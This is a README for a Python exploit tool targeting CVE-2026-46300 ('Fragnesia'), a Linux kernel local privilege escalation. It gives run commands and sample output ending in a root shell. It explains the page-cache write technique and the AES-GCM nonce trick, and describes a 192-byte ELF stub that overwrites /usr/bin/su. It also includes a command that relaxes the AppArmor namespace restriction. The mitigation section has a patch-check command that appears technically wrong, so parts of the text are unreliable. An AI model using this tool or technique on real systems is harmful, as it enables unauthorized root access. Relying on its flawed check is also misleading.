## https://sploitus.com/exploit?id=B5DED594-DA46-566B-B4FE-60D7564C12EF
# Fragnesia (CVE-2026-46300) - Python Exploit
[](https://www.python.org/) [](LICENSE) [](https://www.kernel.org/) [](https://nvd.nist.gov/vuln/detail/CVE-2026-46300)
**Linux Kernel Local Privilege Escalation via ESP-in-TCP Page Cache Corruption**
---
## β οΈ WARNING β READ BEFORE USE
> **This tool is provided for educational and authorized security testing purposes only.**
> - Unauthorized use of this exploit against systems you do not own or lack explicit permission to test is **illegal and unethical**.
> - The author assumes **no responsibility** for any misuse or damage caused by this software.
> - **Only execute this code in isolated, nonβproduction environments** (e.g., personal VMs, CTF labs, or systems you own).
> - By using this software, you agree that you are solely responsible for complying with all applicable laws and regulations.
---
## π Overview
**CVE-2026-46300**, nicknamed **Fragnesia**, is a highβseverity local privilege escalation vulnerability in the Linux kernel. It allows an unprivileged local user to gain root access **deterministically** β without relying on race conditions or timing attacks.
The flaw resides in the XFRM (IPsec framework) subsystem, specifically in the ESPβinβTCP data path. A logic error in `skb_try_coalesce()` fails to propagate the `SKBFL_SHARED_FRAG` flag, causing the kernel to treat fileβbacked pages as writable.
By exploiting the AESβGCM decryption flow, an attacker can perform arbitrary byteβbyβbyte writes to the page cache of any readable file β including setuid binaries like `/usr/bin/su`.
**Key characteristics:**
- β **Deterministic** β no race condition required
- β **Reliable** β works on all vulnerable kernel versions
- β **Silent** β only modifies page cache; disk remains intact
- β **No root required** β works from any unprivileged local user
---
## π Requirements
| Requirement | Details |
|-------------------|---------|
| **Linux Kernel** | Vulnerable versions (see [Vulnerable Kernels](#-vulnerable-kernels)) |
| **Python** | 3.8 or higher |
| **Kernel Modules**| `esp4`, `esp6`, `xfrm4_tcp`, `xfrm6_tcp` (loaded automatically) |
| **User Namespaces**| Must be enabled (default) |
| **AppArmor** | If using Ubuntu, may need to disable restriction: `sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0` |
| **Permissions** | Nonβroot user (the exploit escalates privileges) |
---
## π Installation & Usage
### 1. Clone the Repository
```bash
git clone https://github.com/yourusername/fragnesia-poc.git
cd fragnesia-poc
```
### 2. Run the Exploit
```bash
# Default target: /usr/bin/su
python3 exploit.py
# Optional: specify a custom target binary
python3 exploit.py /path/to/target
```
## Expected Output
```text
[*] Fragnesia (CVE-2026-46300) Exploit
[*] Target: /usr/bin/su
[*] Creating user namespace...
[*] Inside namespace: uid=0, gid=0
[*] Creating network namespace...
[*] Configuring XFRM ESP-in-TCP state...
[*] Building AES-GCM keystream table...
[*] Keystream table built successfully
[*] Writing 192 bytes to page cache...
[+] Payload written to page cache successfully!
[*] Executing target to spawn root shell...
# id
uid=0(root) gid=0(root) groups=0(root)
#
```
## Cleanup (Optional)
The exploit only modifies the page cache. To revert changes:
```bash
echo 1 | sudo tee /proc/sys/vm/drop_caches
```
## π§ How It Works (Technical Deep Dive)
## The Vulnerability: skb_try_coalesce() Bug
The kernel function `skb_try_coalesce()` merges multiple socket buffers (SKBs) to optimize network performance. However, it fails to propagate the `SKBFL_SHARED_FRAG` flag, which indicates that the underlying pages are shared with other subsystems (e.g., the file system page cache).
## XFRM and ESPβinβTCP
When a TCP socket is configured with the `espintcp` upperβlayer protocol (ULP), the kernel treats incoming TCP data as ESPβencapsulated packets. The XFRM framework decrypts these packets inβplace using AESβGCM.
## The Attack Chain
```text
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 1. Attacker reads target file (e.g., /usr/bin/su) β
β β Pages enter the page cache β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2. Attacker sends file pages via splice() to a TCP socket β
β β SKB references page cache (SKBFL_SHARED_FRAG set) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 3. TCP coalescing merges SKBs β SKBFL_SHARED_FRAG is LOST β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 4. Socket transitions to espintcp (TCP_ULP) β
β β XFRM receives ESPβencrypted data β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 5. XFRM decrypts inβplace using AESβGCM β
β β skb_cow_data() sees no SKBFL_SHARED_FRAG β no COW β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 6. Decryption writes directly to page cache of target file β
β β Attacker controls IV to write arbitrary bytes β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
## The Cryptographic Trick (AESβGCM Keystream Control)
The attacker builds a lookup table mapping each byte value (`0x00β0xFF`) to an AESβGCM nonce (IV) that produces that byte as the first keystream byte. During decryption:
```text
plaintext = ciphertext XOR keystream
```
To write `desired_byte`:
```text
needed_keystream = current_byte XOR desired_byte
nonce = lookup_table[needed_keystream]
```
The ESP packet is constructed with this nonce, and the kernel's AESβGCM decryption produces the desired byte.
## Payload Injection
The exploit overwrites the first 192 bytes of `/usr/bin/su` with a small ELF stub that:
- Calls `setresuid(0,0,0)` and `setresgid(0,0,0)` to escalate privileges
- Executes `/bin/sh` with root privileges
When a user runs `/usr/bin/su`, the page cache serves the modified binary, granting root access without touching the disk.
---
## π― Vulnerable Kernels
The vulnerability has been patched in the following kernel versions:
| Distribution | Fixed Version |
|----------------------|------------------------------------------------------------|
| Debian 12 (Bookworm) | 6.1.159-1 or later |
| Debian 11 (Bullseye) | 6.1.159-1~deb11u1 or later |
| Debian Trixie/Sid | 6.12.32-1 or later |
| Ubuntu 22.04 LTS | 6.8.0-58-generic or later (check vendor advisories) |
| RHEL/CentOS 9 | kernel-5.14.0-543.el9 or later (check vendor advisories) |
All kernels released before May 13, 2026 are considered vulnerable unless the vendor has backported the patch.
### Checking Your Kernel Version
```bash
uname -r
```
### Checking if the Patch is Applied
```bash
# Check if the fix is present (kernel source)
grep -q 'SKBFL_SHARED_FRAG' /proc/kallsyms && echo 'Patch NOT applied' || echo 'Patch applied'
```
---
## π‘οΈ Mitigation
### Apply the Kernel Update (Recommended)
```bash
# Debian/Ubuntu
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
# RHEL/CentOS/Fedora
sudo dnf update kernel
# After update, reboot
sudo reboot
```
### Disable ESPβinβTCP (Temporary Workaround)
If you cannot update immediately, remove the vulnerable modules:
```bash
sudo rmmod esp4 esp6 xfrm4_tcp xfrm6_tcp
```
Prevent them from loading on boot:
```bash
echo 'install esp4 /bin/false' | sudo tee /etc/modprobe.d/fragnesia.conf
echo 'install esp6 /bin/false' | sudo tee -a /etc/modprobe.d/fragnesia.conf
echo 'install xfrm4_tcp /bin/false' | sudo tee -a /etc/modprobe.d/fragnesia.conf
echo 'install xfrm6_tcp /bin/false' | sudo tee -a /etc/modprobe.d/fragnesia.conf
```
### Restrict User Namespaces
```bash
# Restrict unprivileged user namespaces
echo 0 | sudo tee /proc/sys/user/max_user_namespaces
```
> **Note:** This may break container runtimes (Docker, Podman) and other software that relies on namespaces.
---
## π References
- **CVE Database:** NIST CVEβ2026β46300
- **Kernel Patch:** netdev mailing list
- **Original PoC (C):** v12βsecurity/pocs
- **Technical Analysis:** Maxime288/FragnesiaβCVEβ2026β46300
- **LWN Article:** Fragnesia: bypassing page cache protection
- **Linux Kernel Documentation:** XFRM subsystem
---
## π License
This project is licensed under the **MIT License** β see the `LICENSE` file for details.
---
## π Acknowledgements
- William Bowling and the V12 team for discovering the vulnerability
- Linux kernel maintainers for promptly fixing the issue
- The openβsource security community for analysis and disclosure coordination
---
## β οΈ Final Disclaimer
THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. THE AUTHORS AND CONTRIBUTORS ARE NOT RESPONSIBLE FOR ANY DAMAGE OR LOSS CAUSED BY USING THIS TOOL. USE AT YOUR OWN RISK AND ONLY ON SYSTEMS YOU HAVE PERMISSION TO TEST.
---
## π¬ Contact
Contact For questions, issues, or suggestions, please open an issue on GitHub. text